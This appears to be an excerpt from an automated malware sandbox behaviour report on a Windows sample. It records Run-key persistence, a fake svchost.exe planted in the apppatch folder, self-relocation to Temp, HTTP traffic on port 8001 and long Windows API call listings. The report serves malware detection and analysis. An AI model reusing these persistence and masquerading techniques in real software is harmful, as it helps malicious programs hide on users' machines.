Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run userinit			Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run userinit			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Moves itself to temp directory

Source: c:\users\user\desktop\roundwood.exe

File moved: C:\Users\user\AppData\Local\Temp\3A31.tmp

Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 8001
Source: unknown	Network traffic detected: HTTP traffic on port 8001 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 8001 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 8001
Source: unknown	Network traffic detected: HTTP traffic on port 8001 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 50845 -> 8001
Source: unknown	Network traffic detected: HTTP traffic on port 8001 -> 50845
Source: unknown	Network traffic detected: HTTP traffic on port 50847 -> 8001
Source: unknown	Network traffic detected: HTTP traffic on port 8001 -> 50847

Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D0CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	2_2_02D0CBF0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D0CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	2_2_02D0CBF0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D0CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	2_2_02D0CBF0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D0CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	2_2_02D0CBF0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D0CB80 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,	2_2_02D0CB80
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D0D130 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,	2_2_02D0D130
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D0CE19 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	2_2_02D0CE19
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D0CE19 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	2_2_02D0CE19
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D09C80 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,	2_2_02D09C80
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012ED130 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,	4_2_012ED130
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012ECB80 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,	4_2_012ECB80
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012ECBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	4_2_012ECBF0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012ECBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	4_2_012ECBF0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012ECBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	4_2_012ECBF0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012ECBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	4_2_012ECBF0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012E9C80 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,	4_2_012E9C80
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012ECE19 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	4_2_012ECE19
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012ECE19 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	4_2_012ECE19
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E3D130 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,	5_2_00E3D130
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E3CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	5_2_00E3CBF0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E3CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	5_2_00E3CBF0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E3CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	5_2_00E3CBF0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E3CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	5_2_00E3CBF0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E3CB80 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,	5_2_00E3CB80
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E39C80 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,	5_2_00E39C80
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E3CE19 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	5_2_00E3CE19
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E3CE19 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	5_2_00E3CE19
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E7D130 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,	8_2_00E7D130
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E7CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	8_2_00E7CBF0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E7CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	8_2_00E7CBF0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E7CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	8_2_00E7CBF0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E7CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	8_2_00E7CBF0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E7CB80 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,	8_2_00E7CB80
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E79C80 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,	8_2_00E79C80
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E7CE19 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	8_2_00E7CE19
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E7CE19 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	8_2_00E7CE19

Source: C:\Windows\apppatch\svchost.exe

Code function: 2_2_02D0BA40 HeapCreate,GetCurrentProcessId,RegisterWindowMessageA,OpenFileMappingA,OpenMutexA,MapViewOfFile,OpenFileMappingA,OpenMutexA,OpenMutexA,MapViewOfFile,Sleep,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,WaitForSingleObject,WaitForSingleObject,OpenFileMappingA,MapViewOfFile,ReleaseMutex,GetHandleInformation,CloseHandle,Sleep,ReleaseMutex,WaitForSingleObject,OpenFileMappingA,MapViewOfFile,ReleaseMutex,OpenEventA,GetTickCount,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,

2_2_02D0BA40

Source: C:\Windows\apppatch\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
